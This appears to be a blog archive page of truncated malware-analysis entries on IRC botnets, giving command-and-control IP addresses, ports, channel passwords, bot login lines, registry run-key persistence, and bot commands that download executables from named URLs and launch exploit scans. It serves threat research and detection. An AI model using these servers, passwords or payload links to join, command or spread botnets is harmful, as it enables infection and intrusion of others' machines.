Author: Pig

70.39.71.240(botnet hosted in United States Missoula Sharktech Internet Services)

Uncategorized

Remote Host Port Number 70.39.71.240 51987 NICK {New}[USA-1244024-XP] USER 8408605 “” “lol” :8408605 JOIN ##Crysis Registry Modifications * The newly created Registry Value is: o [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun] + winlog = “%Temp%lsass.exe” so that lsass.exe runs every time Windows starts Memory Modifications * There was a new process created in the system: Process Name Process Filename MainRead more...

java.KUTLUFAMILY.COM(update)

Uncategorized

Remote Host Port Number 178.211.56.102 80 66.90.103.116 80 178.211.56.105 81 PASS sexy Resolved : [java.KUTLUFAMILY.COM] To [178.211.56.105] Resolved : [java.KUTLUFAMILY.COM] To [178.211.56.104] NICK cqdrrkewtnvc USER gazulycxeqrd “” “qzr” :gazulycxeqrd JOIN #3 PONG :irc.dal.net NICK [N00_USA_XP_7237251]` USER SP2-891 * 0 :COMPUTERNAME Now talking in #3 Topic On: [ #3 ] [ .flushdns |.down -S |.update -SRead more...

sohbet.az(botnet hosted in Germany Hetzner Online Ag)

Uncategorized

Remote Host Port Number 173.192.225.170 80 64.211.162.99 80 67.202.66.171 80 67.202.66.203 80 67.202.94.86 80 75.126.182.189 80 95.168.183.188 80 178.63.104.143 6667 NICK USA|51200 USER svkhl 0 0 :USA|51200 JOIN #Dos! USERHOST USA|51200 MODE USA|51200 -x+i PRIVMSG #Dos! :- shell – File opened: www.siber.gen.tr Registry Modifications * The following Registry Key was created: o HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServices * TheRead more...

irc.accesox.net (botnet hosted in France Paris Ovh Sas)

Uncategorized

Remote Host Port Number 222.122.46.122 80 91.121.96.162 6667 91.121.96.162 7000 NICK n{USA|XP}671615 NICK {USA|XP}077961 USER 0779 “” “TsGh” :0779 USER 7334 “” “TsGh” :7334 JOIN ##bote## PRIVMSG ##bote## :[Update]: Updating to: http://www.lespel.co.kr/images/USB_Vlad.exe JOIN #Weed PRIVMSG #Weed : New PC Infected. MODE pLagUe{USA}32852 -ix MODE #Weed -ix NICK pLagUe{USA}32852 USER SkuZ * ok TeaM UniX b0atRead more...

aaaa.forexinvest4.com(botnet hosted in Russian Federation Vline Ltd)

Uncategorized

aaaa.forexinvest4.com ip: 109.196.130.66 aaaa.forexinvest4.com ip: 109.196.130.50 aaaa.forexinvest4.com:6939 PASS laorosr Channel#dpi Channel#! NICK [N00_USA_XP_39922187] rssr SP2-917 * 0 :COMPUTERNAME Now talking in #! Topic is ‘.asc -S|.http http://walthamfinancial.com/xmob.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0 -c|.asc exp_all 10 5 0Read more...